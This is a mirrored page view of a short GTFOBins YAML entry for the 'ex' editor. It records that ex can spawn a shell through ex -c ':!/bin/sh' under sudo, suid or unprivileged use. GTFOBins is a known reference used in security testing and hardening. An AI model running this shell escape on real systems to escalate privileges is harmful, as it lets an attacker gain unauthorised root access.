mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 06:31:33 +01:00
20 lines
247 B
Plaintext
20 lines
247 B
Plaintext
---
|
|
functions:
|
|
inherit:
|
|
- code: |-
|
|
ex
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
from: ed
|
|
shell:
|
|
- code: |-
|
|
ex -c ':!/bin/sh'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
...
|